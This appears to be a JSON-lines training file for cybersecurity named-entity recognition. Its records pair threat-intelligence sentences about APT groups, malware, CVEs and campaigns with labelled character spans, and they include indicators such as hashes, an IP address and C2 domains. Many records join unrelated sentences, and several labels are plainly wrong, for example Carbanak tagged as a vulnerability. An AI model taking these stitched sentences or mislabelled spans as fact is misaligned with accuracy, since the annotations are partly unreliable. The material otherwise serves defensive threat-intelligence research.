{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "ORGANIZATION: defense contractors": [[223, 242]], "ORGANIZATION: colleges": [[245, 253]], "ORGANIZATION: universities": [[258, 270]], "ORGANIZATION: law firms": [[273, 282]], "ORGANIZATION: political organizations": [[289, 312]], "ORGANIZATION: minority ethnic groups": [[358, 380]]}, "info": {"id": "cyberner_stix_train_005795", "source": "cyberner_stix_train"}}
{"text": "It ’ s not enough for this malware family to swap just one innocent application with an infected double . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted . Dexphot also generates the names for the tasks at runtime , which means a simple block list of hardcoded task names will not be effective in preventing them from running . Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": {"ORGANIZATION: Arab": [[192, 196]], "ORGANIZATION: Emirates": [[197, 205]], "MALWARE: Dexphot": [[316, 323]], "ORGANIZATION: Southeast Asian government": [[524, 550]], "ORGANIZATION: Central Asian telecom": [[555, 576]]}, "info": {"id": "cyberner_stix_train_005796", "source": "cyberner_stix_train"}}
{"text": "The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: .txt": [[109, 113]]}, "info": {"id": "cyberner_stix_train_005797", "source": "cyberner_stix_train"}}
{"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ .", "spans": {"THREAT_ACTOR: Lazarus": [[44, 51]], "ORGANIZATION: financial organizations": [[129, 152]], "FILEPATH: ‘Tokyo’": [[219, 226]], "FILEPATH: ‘Yokohama’": [[231, 241]]}, "info": {"id": "cyberner_stix_train_005798", "source": "cyberner_stix_train"}}
{"text": "Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": {"THREAT_ACTOR: TG-3390": [[176, 183]]}, "info": {"id": "cyberner_stix_train_005799", "source": "cyberner_stix_train"}}
{"text": "Kryptowire says the code , which it found on a BLU R1 HD devices , transmitted fine-grained location information and allowed for the remote installation of other apps . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK . Should the user become aware of the infection later , it may be difficult to find the cause due to the fact that the original embedded file contained within the SFX is benign .", "spans": {"ORGANIZATION: Kryptowire": [[0, 10]], "ORGANIZATION: BLU": [[47, 50]], "MALWARE: KHRAT": [[169, 174]], "TOOL: backdoor trojan": [[180, 195]], "THREAT_ACTOR: DragonOK": [[260, 268]]}, "info": {"id": "cyberner_stix_train_005800", "source": "cyberner_stix_train"}}
{"text": "In an extensive email to the victim , the INDRIK SPIDER operator provides a decryptor download link , decryptor deletion link ( to be used following decryptor download ) and a password . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[42, 55]], "ORGANIZATION: Kaspersky": [[187, 196]], "THREAT_ACTOR: ScarCruft": [[213, 222]], "VULNERABILITY: zero-day": [[252, 260]], "VULNERABILITY: CVE-2016-0147": [[263, 276]], "ORGANIZATION: Microsoft": [[298, 307]], "TOOL: XML": [[308, 311]]}, "info": {"id": "cyberner_stix_train_005801", "source": "cyberner_stix_train"}}
{"text": "One sample in particular , cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df used yet another unique user agent string in combination with the previous user agent for its C2 : Mozilla v5.1 ( Windows NT 6.1 ; rv : 6.0.1 ) Gecko Firefox .", "spans": {"FILEPATH: cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df": [[27, 91]], "TOOL: C2": [[186, 188]], "ORGANIZATION: Mozilla": [[191, 198]], "SYSTEM: Windows": [[206, 213]], "TOOL: Gecko": [[236, 241]], "TOOL: Firefox": [[242, 249]]}, "info": {"id": "cyberner_stix_train_005802", "source": "cyberner_stix_train"}}
{"text": "Validating Arabic keyboard and language settings on the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_005803", "source": "cyberner_stix_train"}}
{"text": "Unlike many ransomware operations , which usually just require victims to make the payment and subsequently download a decryptor , INDRIK SPIDER requires the victim to engage in communication with an operator . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: exploit": [[274, 281]], "VULNERABILITY: CVE-2016-4117": [[288, 301]]}, "info": {"id": "cyberner_stix_train_005804", "source": "cyberner_stix_train"}}
{"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": {"MALWARE: infpub.dat": [[20, 30]], "MALWARE: specific file": [[47, 60]], "ORGANIZATION: Palo Alto Networks Unit 42": [[111, 137]], "FILEPATH: malicious files": [[185, 200]], "ORGANIZATION: government": [[266, 276]], "ORGANIZATION: MalwareBytes": [[301, 313]]}, "info": {"id": "cyberner_stix_train_005805", "source": "cyberner_stix_train"}}
{"text": "Take pictures with the embedded camera . The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks . Part one of this research investigates the Spark campaign , where attackers use social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor . With ThreatConnect , teams get a single Platform to simplify the processing , categorization , and response to suspicious emails , reducing the time to remediate active threats from days to minutes .", "spans": {"TOOL: Remsec": [[94, 100]], "TOOL: Backdoor.Remsec": [[103, 118]], "MALWARE: Spark backdoor": [[316, 330]], "TOOL: ThreatConnect": [[338, 351]], "TOOL: Platform": [[373, 381]]}, "info": {"id": "cyberner_stix_train_005806", "source": "cyberner_stix_train"}}
{"text": "Once this Intent object is generated with the action value pointing to the decrypted content , the decryption function returns the Intent object to the callee . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident . ZIP archives are supposed to have one “End of Central Directory” (EOCD) signifying the end of the . In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": {"ORGANIZATION: NCC Group 's Incident Response": [[175, 205]], "ORGANIZATION: GReAT": [[352, 357]], "MALWARE: CozyDuke": [[372, 380]]}, "info": {"id": "cyberner_stix_train_005807", "source": "cyberner_stix_train"}}
{"text": "These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors .", "spans": {"THREAT_ACTOR: criminal groups": [[28, 43]], "THREAT_ACTOR: PoSeidon": [[104, 112]], "VULNERABILITY: Carbanak": [[148, 156]], "THREAT_ACTOR: criminal organization": [[174, 195]], "THREAT_ACTOR: Carbon Spider": [[208, 221]], "THREAT_ACTOR: Turla": [[251, 256]], "MALWARE: fake Flash installers": [[268, 289]]}, "info": {"id": "cyberner_stix_train_005808", "source": "cyberner_stix_train"}}
{"text": "While computers using Microsoft Windows automatically adjust for DST , changes in timezone definitions require that an update to Windows be installed .", "spans": {"ORGANIZATION: Microsoft": [[22, 31]], "SYSTEM: Windows": [[32, 39], [129, 136]]}, "info": {"id": "cyberner_stix_train_005809", "source": "cyberner_stix_train"}}
{"text": "In the case of the infected application not specified in the code , “ Agent Smith ” will simply show ads on the activity being loaded . Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests . The two monitoring services simultaneously check the status of all three malicious processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": {"MALWARE: Agent Smith": [[70, 81]], "THREAT_ACTOR: Clever Kitten": [[136, 149]]}, "info": {"id": "cyberner_stix_train_005810", "source": "cyberner_stix_train"}}
{"text": "Bluetooth — which allows the interaction with the Bluetooth interface , and net/deacon — which implements a beaconing system based on UDP . In early 2016 , the Callisto Group was observed sending targeted spear phishing emails . Based on past APT12 activity , we expect the threat group to continue to utilize phishing as a malware delivery method . 0824.1.doc : f6fafb7c30b1114befc93f39d0698560 , CVE-2012-0158 . Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": {"THREAT_ACTOR: APT12": [[243, 248]], "FILEPATH: 0824.1.doc": [[350, 360]], "FILEPATH: f6fafb7c30b1114befc93f39d0698560": [[363, 395]], "VULNERABILITY: CVE-2012-0158": [[398, 411]]}, "info": {"id": "cyberner_stix_train_005811", "source": "cyberner_stix_train"}}
{"text": "Those targeted include applications like Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . APT40 relies heavily on web shells for an initial foothold into an organization .", "spans": {"SYSTEM: Paypal Business": [[41, 56]], "SYSTEM: Revolut": [[59, 66]], "SYSTEM: Barclays": [[69, 77]], "SYSTEM: UniCredit": [[80, 89]], "SYSTEM: CapitalOne UK": [[92, 105]], "SYSTEM: HSBC UK": [[108, 115]], "SYSTEM: Santander UK": [[118, 130]], "SYSTEM: TransferWise": [[133, 145]], "SYSTEM: Coinbase": [[148, 156]], "SYSTEM: paysafecard": [[159, 170]], "TOOL: Java related application": [[225, 249]], "MALWARE: Java file": [[337, 346]], "THREAT_ACTOR: APT40": [[349, 354]], "MALWARE: web shells": [[373, 383]]}, "info": {"id": "cyberner_stix_train_005812", "source": "cyberner_stix_train"}}
{"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing , the functionality of most of the Western versions of Riltok Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . In this version , the developer used a different API , the Wininet API which make more sense for Web requests .", "spans": {"SYSTEM: Google Play": [[75, 86]], "ORGANIZATION: Kaspersky": [[550, 559]], "MALWARE: backdoor": [[577, 585]], "THREAT_ACTOR: Turla": [[630, 635]], "TOOL: Wininet API": [[697, 708]]}, "info": {"id": "cyberner_stix_train_005813", "source": "cyberner_stix_train"}}
{"text": "Even though we could not find indications of being in use , two stand out . In October 2015 , the Callisto Group was observed sending targeted credential phishing emails . FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases . Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": {"THREAT_ACTOR: Callisto Group": [[98, 112]], "ORGANIZATION: FireEye": [[172, 179]], "THREAT_ACTOR: APT12": [[189, 194]], "TOOL: emails": [[240, 246]]}, "info": {"id": "cyberner_stix_train_005814", "source": "cyberner_stix_train"}}
{"text": "Users may be required the help of their device manufacturer to get support for firmware flashing . In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets . To resolve that issue , The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": {"THREAT_ACTOR: Cobalt Group": [[141, 153]], "TOOL: Cobalt Strike": [[204, 217]], "ORGANIZATION: Harrison": [[304, 312], [406, 414]], "ORGANIZATION: Ashley Madison": [[353, 367]]}, "info": {"id": "cyberner_stix_train_005815", "source": "cyberner_stix_train"}}
{"text": "If you take a look at the below PowerShell , you ’ll quickly understand why .", "spans": {"TOOL: PowerShell": [[32, 42]]}, "info": {"id": "cyberner_stix_train_005816", "source": "cyberner_stix_train"}}
{"text": "To reach this conclusion , we began by analyzing the apparent objectives and motivations of the group .", "spans": {}, "info": {"id": "cyberner_stix_train_005817", "source": "cyberner_stix_train"}}
{"text": "Islamawazi is also known as the Turkistan Islamic Party or “ TIP ” . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . However , three themes in APT28 's targeting clearly reflects LOCs of specific interest to an Eastern European government , most likely the Russian government .", "spans": {"SYSTEM: Islamawazi": [[0, 10]], "ORGANIZATION: Turkistan Islamic Party": [[32, 55]], "THREAT_ACTOR: APT41": [[125, 130]], "THREAT_ACTOR: APT28": [[300, 305]], "ORGANIZATION: government": [[385, 395]], "ORGANIZATION: Russian government": [[414, 432]]}, "info": {"id": "cyberner_stix_train_005818", "source": "cyberner_stix_train"}}
{"text": "“ jackhex ” is not a common word or phrase and , as noted above , was also seen in the beacon activity with the previously discussed 9002 sample . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . OceanLotus , also known as APT32 , is believed to be a Vietnam-based APT group that has become increasingly sophisticated in its attack tactics , techniques , and procedures ( TTPs ) .", "spans": {"MALWARE: 9002": [[133, 137]], "MALWARE: BalkanRAT": [[147, 156]], "MALWARE: BalkanDoor": [[267, 277]], "THREAT_ACTOR: OceanLotus": [[383, 393]], "THREAT_ACTOR: APT32": [[410, 415]]}, "info": {"id": "cyberner_stix_train_005819", "source": "cyberner_stix_train"}}
{"text": "Here are some of the Seduploader features :", "spans": {"MALWARE: Seduploader": [[21, 32]]}, "info": {"id": "cyberner_stix_train_005820", "source": "cyberner_stix_train"}}
{"text": "Svpeng is capable of doing lots of things . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets . For any inquiries , contact us at threatintel@eset.com . An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": {"MALWARE: Svpeng": [[0, 6]], "THREAT_ACTOR: Turla": [[44, 49]]}, "info": {"id": "cyberner_stix_train_005821", "source": "cyberner_stix_train"}}
{"text": "It will also report the version of Android that the phone is running and any additional capabilities . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"SYSTEM: Android": [[35, 42]], "THREAT_ACTOR: ITG08": [[227, 232]], "THREAT_ACTOR: FIN6": [[249, 253]], "THREAT_ACTOR: APT37": [[268, 273]], "ORGANIZATION: company": [[304, 311]]}, "info": {"id": "cyberner_stix_train_005822", "source": "cyberner_stix_train"}}
{"text": "With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": {"TOOL: GozNym": [[5, 11]], "ORGANIZATION: bank": [[62, 66]], "TOOL: URL": [[70, 73]], "TOOL: SSL certificate": [[78, 93]], "MALWARE: PlugX DLL": [[121, 130]]}, "info": {"id": "cyberner_stix_train_005823", "source": "cyberner_stix_train"}}
{"text": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim 's network by copying itself over network shares . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website .", "spans": {"THREAT_ACTOR: Kwampirs": [[0, 8]], "MALWARE: MoonWind samples": [[170, 186]], "TOOL: C2": [[202, 204]], "MALWARE: legitimate website": [[271, 289]]}, "info": {"id": "cyberner_stix_train_005824", "source": "cyberner_stix_train"}}
{"text": "Generic Windows Defender ATP detections trigger alerts on FinFisher behavior While our analysis has allowed us to immediately protect our customers , we ’ d like to share our insights and add to the growing number of published analyses by other talented researchers ( listed below this blog post ) . The well-known threat group called DRAGONFISH or Lotus Blossom are distributing a new form of Elise malware targeting organizations for espionage purposes . Perhaps the attackers are trying to reduce the load from their C&C servers by avoiding callbacks from uninteresting victims . The domain name was created on the same day the ad appeared and the website is a copy of the real one .", "spans": {"SYSTEM: Windows Defender ATP": [[8, 28]], "MALWARE: FinFisher": [[58, 67]], "THREAT_ACTOR: threat group": [[315, 327]], "THREAT_ACTOR: DRAGONFISH": [[335, 345]], "THREAT_ACTOR: Lotus Blossom": [[349, 362]], "TOOL: Elise malware": [[394, 407]], "THREAT_ACTOR: espionage": [[436, 445]]}, "info": {"id": "cyberner_stix_train_005825", "source": "cyberner_stix_train"}}
{"text": "The group primarily uses the MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: MSR 606 Software": [[29, 45]], "TOOL: Hardware": [[62, 70]], "ORGANIZATION: Symantec": [[123, 131]], "ORGANIZATION: customers": [[234, 243]]}, "info": {"id": "cyberner_stix_train_005826", "source": "cyberner_stix_train"}}
{"text": "This period started with their seeming disappearance in October 2018 and concluded with their return in April 2019 . he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"THREAT_ACTOR: PassCV": [[120, 126]], "MALWARE: RATs": [[171, 175]]}, "info": {"id": "cyberner_stix_train_005827", "source": "cyberner_stix_train"}}
{"text": "Check Point Mobile Threat Prevention has detected two instances of a mobile malware variant infecting multiple devices within the Check Point customer base . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences .", "spans": {"ORGANIZATION: Check Point": [[0, 11], [130, 141]], "SYSTEM: Mobile Threat Prevention": [[12, 36]], "THREAT_ACTOR: attackers": [[172, 181]], "MALWARE: MS PowerPoint document": [[190, 212]], "VULNERABILITY: CVE-2014-6352": [[238, 251]], "THREAT_ACTOR: APT10": [[254, 259]], "ORGANIZATION: MSPs": [[329, 333]]}, "info": {"id": "cyberner_stix_train_005828", "source": "cyberner_stix_train"}}
{"text": "Upon start , it creates a window with the class name “ Hello ” and title “ Program ” , subscribes for device arrival notifications for that window and enters a standard Windows message processing loop .", "spans": {"SYSTEM: Windows": [[169, 176]]}, "info": {"id": "cyberner_stix_train_005829", "source": "cyberner_stix_train"}}
{"text": "Clicking on thenotification will result in launching a specified app startApp Starts the specified application getInstallApps Gets the list of installedapplications on the infected device getContacts Gets the contact names and phone numbers from the addressbook on the infected device deleteApplication Triggers the deletion of the specified application forwardCall Enables call forwarding to the specified number sendSms Sends a text message with specified text from the infecteddevice to the specified phone number startInject Triggers the overlay attack against the specified application startUssd The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking . BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics .", "spans": {"THREAT_ACTOR: SectorJ04": [[605, 614]], "TOOL: ServHelper": [[654, 664]], "TOOL: FlawedAmmy RAT": [[669, 683]], "THREAT_ACTOR: BlackOasis": [[700, 710]], "ORGANIZATION: politics": [[779, 787]]}, "info": {"id": "cyberner_stix_train_005830", "source": "cyberner_stix_train"}}
{"text": "Results from the commands systeminfo and tasklist Current execution path Capture screenshot Drive enumeration Drive serial number .", "spans": {}, "info": {"id": "cyberner_stix_train_005831", "source": "cyberner_stix_train"}}
{"text": "The screenshots provided by the author align with the advertised features and the features that we discovered while doing our analysis . Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest . The goal of the attack was to surgically target an unknown pool of users , which were identified by their network adapters’ MAC addresses . It is a challenge for any organisation to fight off a determined ransomware gang like Vice Society , but schools face the added pressure of doing so in a notoriously tight budgetary environment .", "spans": {"ORGANIZATION: network": [[209, 216]], "THREAT_ACTOR: ransomware gang": [[486, 501]], "THREAT_ACTOR: Vice Society": [[507, 519]], "ORGANIZATION: schools": [[526, 533]]}, "info": {"id": "cyberner_stix_train_005832", "source": "cyberner_stix_train"}}
{"text": "Influence operations , also frequently called “ information operations , ” have a long history of inclusion in Russian strategic doctrine , and have been intentionally developed , deployed , and modernized with the advent of the internet .", "spans": {}, "info": {"id": "cyberner_stix_train_005833", "source": "cyberner_stix_train"}}
{"text": "Check Point Software Hummingbad/Shedun infections by Android version . In November 2017 , Secureworks Counter Threat Unit™ ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company . APT33 : 217.147.168.44 remserver.ddns.net . Establish robust network segmentation between MicroSCADA hosts and IT networks .", "spans": {"ORGANIZATION: Check Point Software": [[0, 20]], "MALWARE: Hummingbad/Shedun": [[21, 38]], "SYSTEM: Android": [[53, 60]], "ORGANIZATION: Secureworks Counter Threat Unit™": [[90, 122]], "ORGANIZATION: CTU": [[125, 128]], "THREAT_ACTOR: cyber threat group": [[171, 189]], "THREAT_ACTOR: Lazarus Group": [[201, 214]], "THREAT_ACTOR: NICKEL ACADEMY": [[241, 255]], "ORGANIZATION: Secureworks": [[259, 270]], "ORGANIZATION: cryptocurrency company": [[390, 412]], "THREAT_ACTOR: APT33": [[415, 420]], "IP_ADDRESS: 217.147.168.44": [[423, 437]], "DOMAIN: remserver.ddns.net": [[438, 456]]}, "info": {"id": "cyberner_stix_train_005834", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : get.adobe.go-microstf.com .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: get.adobe.go-microstf.com": [[11, 36]]}, "info": {"id": "cyberner_stix_train_005835", "source": "cyberner_stix_train"}}
{"text": "In both cases , the executable file was a self-extracting executable containing PoisonIvy , a common backdoor Trojan developed by a Chinese speaker .", "spans": {"MALWARE: PoisonIvy": [[80, 89]], "MALWARE: Trojan": [[110, 116]]}, "info": {"id": "cyberner_stix_train_005836", "source": "cyberner_stix_train"}}
{"text": "The same numerical code corresponded to one command in different versions , but the set of supported commands varied . TG-3390 actors have deployed the OwaAuth web shell to Exchange servers , disguising it as an ISAPI filter . These routines are indicative of the group ’s aim to get quantitative returns through varied cybercriminal profit streams . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": {"THREAT_ACTOR: TG-3390": [[119, 126]], "TOOL: OwaAuth web shell": [[152, 169]], "ORGANIZATION: Volexity": [[370, 378]], "MALWARE: Dukes": [[394, 399]], "MALWARE: PowerDuke": [[582, 591]]}, "info": {"id": "cyberner_stix_train_005837", "source": "cyberner_stix_train"}}
{"text": "We found the same Quasar code in an additional attack on the same day , but upon a different target .", "spans": {"MALWARE: Quasar": [[18, 24]]}, "info": {"id": "cyberner_stix_train_005838", "source": "cyberner_stix_train"}}
{"text": "Written by Jagadeesh Chandraiah JULY 23 , 2018 SophosLabs has uncovered a mobile malware distribution campaign that uses advertising placement to distribute the Red Alert Trojan , linking counterfeit branding of well-known apps to Web pages that deliver an updated , 2.0 version of this bank credential thief . In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) . Config.ini is the file where the malware stores its encrypted configuration data.List of files to send to C2 using bitsadmin.exe from the dedicated thread: upLog.txt , upSCRLog.txt , upSpecial.txt , upFile.txt , upMSLog.txt . http://108.61.189.174 control server HTTP . The primary motivation of a hacker is money , and getting it can be done with a variety of methods .", "spans": {"ORGANIZATION: SophosLabs": [[47, 57]], "MALWARE: Red Alert Trojan": [[161, 177]], "THREAT_ACTOR: APT37": [[321, 326]], "ORGANIZATION: company": [[353, 360]], "ORGANIZATION: telecommunications service": [[439, 465]], "FILEPATH: Config.ini": [[512, 522]], "TOOL: C2": [[618, 620]], "FILEPATH: bitsadmin.exe": [[627, 640]], "FILEPATH: upLog.txt": [[668, 677]], "FILEPATH: upSCRLog.txt": [[680, 692]], "FILEPATH: upSpecial.txt": [[695, 708]], "FILEPATH: upFile.txt": [[711, 721]], "FILEPATH: upMSLog.txt": [[724, 735]], "URL: http://108.61.189.174": [[738, 759]], "THREAT_ACTOR: hacker": [[810, 816]]}, "info": {"id": "cyberner_stix_train_005839", "source": "cyberner_stix_train"}}
{"text": "If it ’ s not 0x1B ( for 32-bit systems ) or 0x23 ( for 32-bit system under Wow64 ) , the loader exits . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt . Winnti : T1079 Multilayer Encryption . “ lun.vbs ” , which runs n.bat", "spans": {"TOOL: custom dropper": [[158, 172]], "MALWARE: MagicHound.DropIt": [[200, 217]], "THREAT_ACTOR: Winnti": [[220, 226]]}, "info": {"id": "cyberner_stix_train_005840", "source": "cyberner_stix_train"}}
{"text": "As the Play Store has introduced new policies and Google Play Protect has scaled defenses , Bread apps were forced to continually iterate to search for gaps . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy . This trick renders identification by firewall more cumbersome . In general terms , spyware is software that can be installed on a device and used to monitor activity and/or capture potentially sensitive data .", "spans": {"SYSTEM: Play Store": [[7, 17]], "SYSTEM: Google Play Protect": [[50, 69]], "MALWARE: Bread": [[92, 97]], "THREAT_ACTOR: Anchor Panda": [[168, 180]], "ORGANIZATION: CrowdStrike": [[202, 213]], "TOOL: firewall": [[461, 469]], "MALWARE: spyware": [[507, 514]]}, "info": {"id": "cyberner_stix_train_005841", "source": "cyberner_stix_train"}}
{"text": "EventBot Obfuscated class names Obfuscated class names using letters of the alphabet . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: SWAnalytics": [[111, 122]], "MALWARE: Mia Ash": [[250, 257]], "THREAT_ACTOR: actors": [[322, 328]]}, "info": {"id": "cyberner_stix_train_005842", "source": "cyberner_stix_train"}}
{"text": "The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data . Most modules were created in 2012 .", "spans": {"TOOL: NetTraveler trojan": [[4, 22]]}, "info": {"id": "cyberner_stix_train_005843", "source": "cyberner_stix_train"}}
{"text": "The GeminiDuke toolset consists of a core information stealer , a loader and multiple persistencerelated components .", "spans": {"MALWARE: GeminiDuke": [[4, 14]], "TOOL: information stealer": [[42, 61]], "TOOL: loader": [[66, 72]], "TOOL: multiple persistencerelated components": [[77, 115]]}, "info": {"id": "cyberner_stix_train_005844", "source": "cyberner_stix_train"}}
{"text": "In 2017 and early 2018 , the group used PowerShell commands to call Mimikatz from an online PowerSploit repository , which is a collection of publicly available PowerShell modules for penetration testing . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December .", "spans": {"TOOL: PowerShell commands": [[40, 59]], "TOOL: Mimikatz": [[68, 76]], "TOOL: PowerShell modules": [[161, 179]], "ORGANIZATION: Palo Alto Networks AutoFocus": [[235, 263]]}, "info": {"id": "cyberner_stix_train_005845", "source": "cyberner_stix_train"}}
{"text": "Sandworm Team went to ground shortly after being exposed in October of 2014 , and malware with Dune references ( the genesis for the ' Sandworm ' moniker ) which we had previously used to track them disappeared entirely . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"THREAT_ACTOR: Sandworm Team": [[0, 13]], "THREAT_ACTOR: Sandworm": [[135, 143]], "ORGANIZATION: specific individuals": [[305, 325]], "VULNERABILITY: zero-day": [[366, 374]]}, "info": {"id": "cyberner_stix_train_005846", "source": "cyberner_stix_train"}}
{"text": "Although we are unable to provide details in support of such attribution , previous work by security vendor FireEye suggests the group might be of Russian origin , however no evidence allows to tie the attacks to governments of any particular country .", "spans": {"ORGANIZATION: FireEye": [[108, 115]]}, "info": {"id": "cyberner_stix_train_005847", "source": "cyberner_stix_train"}}
{"text": "The Dukes have employed exploits both in their infection vectors as well as in their malware .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005848", "source": "cyberner_stix_train"}}
{"text": "In the case of Android devices , accessing the malicious website or pressing any of the buttons will prompt the download of the APK . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors . Glimpse is a PowerShell script that is executed silently by Visual Basic . The victims in this campaign a government in Asia and a telecommunications company in the Middle East do align with the kinds of victims we often see Budworm targeting .", "spans": {"SYSTEM: Android": [[15, 22]], "THREAT_ACTOR: APT1": [[175, 179]], "THREAT_ACTOR: cyber threat actors": [[254, 273]], "MALWARE: Glimpse": [[276, 283]], "TOOL: PowerShell": [[289, 299]], "TOOL: Visual Basic": [[336, 348]], "ORGANIZATION: a government in Asia": [[380, 400]], "ORGANIZATION: a telecommunications company in the Middle East": [[405, 452]], "THREAT_ACTOR: Budworm": [[501, 508]]}, "info": {"id": "cyberner_stix_train_005849", "source": "cyberner_stix_train"}}
{"text": "It is ROPless , and instead constructs a fake vtable for a FileReference object that is modified for each call to a Windows API .", "spans": {"TOOL: ROPless": [[6, 13]], "SYSTEM: Windows": [[116, 123]], "TOOL: API": [[124, 127]]}, "info": {"id": "cyberner_stix_train_005850", "source": "cyberner_stix_train"}}
